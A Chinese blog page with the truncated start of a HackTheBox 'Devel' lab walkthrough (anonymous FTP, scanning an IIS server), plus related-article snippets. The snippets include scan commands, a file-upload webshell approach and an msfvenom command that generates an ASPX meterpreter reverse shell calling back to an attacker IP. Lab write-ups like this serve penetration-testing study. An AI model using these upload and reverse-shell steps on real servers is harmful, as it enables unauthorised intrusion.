hackthebox-Devel (考点:ftp/IIS/windows)不用msf

最新推荐文章于 2022-11-29 16:05:16 发布
最新推荐文章于 2022-11-29 16:05:16 发布
阅读量360 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45527786/article/details/105422946
版权

用msf做很快,很多人做这台机器写writeup也是用msf做的。但针对oscp,本篇文章不用msf

1、nmap

在这里插入图片描述

2、ftp探测

看到21ftp要想到进去看看,找敏感文件

匿名anonymous进入,用户名密码都是anonymous
在这里插入图片描述
也没啥。但是你也有可能看到一些shell已经在里面了,那是因为之前有人做的留下的。开启机器,不一定会全部重置,会有前人的痕迹。我发现是这样。

可以看到IIS的图片。

再看80

扫描,没什么发现

最低0.47元/天 解锁文章
冬萍子
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
HackTheBox-Devel渗透测试
weixin_43111940的博客
04-15 191
端口信息 sudo nmap -sC -sV -A -p 21,80 10.10.10.5 匿名访问21端口,把里面的文件下载下来 访问80端口,是IIS7.0的 查看源码也没有什么收获 目录扫描发现了/aspnet_client 目录 gobuster dir -u http://10.10.10.5:80 -w /usr/share/wordlists/dirb/common.txt 重点来了,/aspnet_client就是ftp里发现的文件夹!(其实看到有iisstart.htm也可以猜
Hackthebox:Devel Walkthrough
汗的博客
12-05 358
预备知识 ftp anonymous登录、任意文件上传、msfvenom生成webshell、meterpreter后渗透 信息收集 nmap 探测一下开放端口和服务 nmap 10.10.10.5 结果如下 Nmap scan report for 10.10.10.5 Host is up (0.34s latency). Not shown: 998 filtered ports PORT STATE SERVICE 21/tcp open ftp 80/tcp open http Nmap
Hack the box靶机 Devel
菜浪马废的博客
05-27 270
Web服务器[IIS支持.aspx .asp文件] 做了两个windows的 walkthrough都是教用msf提权的 难道我msf一定要用到win上么?
Hack The Box::Devel
aya3t的博客
10-10 160
Hack The Box::Devel
hack the box devel靶机
zr1213159840的博客
04-23 2429
打开靶机,开扫,能看出来开了ftp和80端口,而且ftp能匿名访问。 nmap -sV -Pn -A 10.10.10.5 访问地址能发现就是IIS的界面,本来想着下面也许会有东西,但是爆破后没东西。登录一下ftp,发现进了网站的目录,测试上传的东西后,确实是网站的目录,那么就可以上传木马了。 生成asp木马 msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.15 LPORT=4444 -f aspx -o shell.aspx 在
【Hack The Boxwindows练习-- devel
人间体佐菲的博客
10-28 1130
【Hack The Boxwindows练习-- devel
linux输入yum后提示: -bash: /usr/bin/yum: No such file or directory的解决方法
09-14
在本篇文章里小编给大家整理的是关于linux输入yum后提示: -bash: /usr/bin/yum: No such file or directory的解决方法,有需要的朋友们参考下。
CentOS7 nginx离线安装gcc/pcre-devel/openssl-devel/zlib-devel
01-04
本教程将详细介绍如何在CentOS 7上离线安装GCC、PCRE-devel、OpenSSL-devel和Zlib-devel这些重要的开发工具包,这些都是构建和编译Nginx web服务器所必需的依赖。以下是一个详细的步骤指南。 首先,`CentOS7 nginx...
gcc/pcre-devel/openssl-devel/zlib-devel negix centos7依赖rpm
08-01
标题中的“gcc/pcre-devel/openssl-devel/zlib-devel negix centos7依赖rpm”揭示了几个关键的组件,它们是Negix在CentOS 7环境下运行所必需的开发库。让我们详细了解一下这些组件及其重要性。 1. **Negix**: Negix...
CentOS7 nginx离线安装gcc/pcre-devel/openssl-devel/zlib-devel以及其他包
08-12
glibc-devel-2.17-260.el7.x86_64 openssl-1.0.2k-16.el7.x86_64 openssl-devel-1.0.2k-16.el7.x86_64 openssl-libs-1.0.2k-16.el7.x86_64 pcre-devel-8.32-17.el7.x86_64 zlib-1.2.7-18.el7.x86_64.rpm zlib-devel-...
国外IIS扫描探测工具_IIs Put_Scanner_v1.1 iiswrite
03-31
国外IIS扫描探测工具_IIs Put_Scanner_v1.1 iiswrite。。。。
db4-devel和libcap-devel
11-12
在linuxpython安装过程中可能会有db4-devel和libcap-devel不能知道的问题可下载文档使用rpm -ivh libpcap-1.9.0-3.el8.x86_64.rpm libpcap-devel-1.9.0-3.el8.x86_64.rpm libdb4-4.8.30-30.el8.x86_64.rpm libdb4-...
No.68-HackTheBox-windows-Devel-Walkthrough渗透学习
qq_34801745的博客
03-14 427
** HackTheBox-windows-Devel-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/3 靶机难度:初级(3.9/10) 靶机发布日期:2017年10月3日 靶机描述: Devel, while relatively simple, demonstrates the security risk...
HTB Devel[Hack The Box HTB靶场]writeup系列3
重新启程
02-01 2676
Retired Machines的第三台机器Devel 目录 0x00 靶机情况 0x01 端口扫描 0x02 ftp服务 0x03 上传payload 0x04 get webshell 0x05 提权 0x00 靶机情况 从靶机的情况来看,难度属于初级,基本上都是选择1、2、3分为主,操作系统是windows 0x01 端口扫描 看看靶机提供了哪些服务: roo...
hackthebox-Blue(考点:smb 蓝)不用msf
冬萍子癸水
04-09 666
这个机子用msf做很快。针对oscp备考者,这篇文章不用msf。 nmap 没啥其他端口,就是smb。用我们对smb常用的扫描方法 nmap -p 445 --script vuln 10.10.10.40 提示这台ms17-010 是有漏洞的。 searchsploit ms17-010 有好多,最后选择倒数第二个 42315.py 先准备好这个脚本要传的弹shell的exe。 msf...
Hackthebox :: Devel反思总结
Soul Blog
11-22 374
Hackthebox :: Devel反思总结 develhackthebox上一台简单的windows靶机,我将对其主要内容进行总结与反思 反思 对FTP服务的命令不够熟悉 对msfvenom制作载荷不够熟,msfvenom中变量lhost和lport后面接 ” = “再接参数 总结 部分FTP命令 .aspx是一个动态网络页面文件 扫描的21号FTP端口看到的信息中,Anonymous FTP login allowed代表着允许匿名登录,iisstart.htm 告知我们在msf
[Hackthebox] Fawn (FTP)
weixin_63231007的博客
06-28 1140
1、三个字母缩写 FTP 代表什么? 答案:File Transfer Protocol 2、FTP服务通常监听哪个端口?答案:21FTP监听 TCP端口号为21,数据端口为203、FTP 的安全版本使用什么首字母缩写词?答案:SFTP4、我们可以使用什么命令来发送 ICMP 回显请求以测试我们与目标的连接?答案:ping 5、根据您的扫描,目标上运行的 FTP 版本是什么?答案:vsftpd 3.0.3 6、根据您的扫描,目标上正在运行什么操作系统类型?根据第五个问题 nmap的扫描结果可知 操作系统类型
Hack The Box - Forge 通过黑名单混淆执行针对ftp服务器的SSRF攻击获取用户私钥,利用SUID提权得到root权限
Zyu0
11-29 725
Hack The Box - Forge 通过大小写及黑名单混淆执行SSRF攻击获取用户权限,利用SUID提权得到root权限
hackthebox - hawk(考点:ftp/openssl解密/drupal/端口转发/h2)
冬萍子癸水
04-08 361
nmap 端口21/22/80/8082,看/21想到进入ftp搜有什么文件,22想到利用ssh,8082是个高冷端口,运行着数据库h2,可能为突破点 先看21 ftp 10.10.10.102 需要账户密码,输入anonymous,也就是匿名登录 找到这个txt.enc,输入get .drupal.txt.enc 把它下载到本机 本机要在文件夹设置里打开显示隐藏,否则看不到它 enc肯定是 ...
-- Defined-By: systemd -- Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel -- 怎么解决
最新发布
05-12
这是一个由systemd生成的注释,它提供了有关systemd的支持信息和邮件列表。通常情况下,如果你没有遇到任何与系统启动或服务启动相关的问题,你可以忽略这个注释。 如果你确实遇到了与系统启动或服务启动相关的问题...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值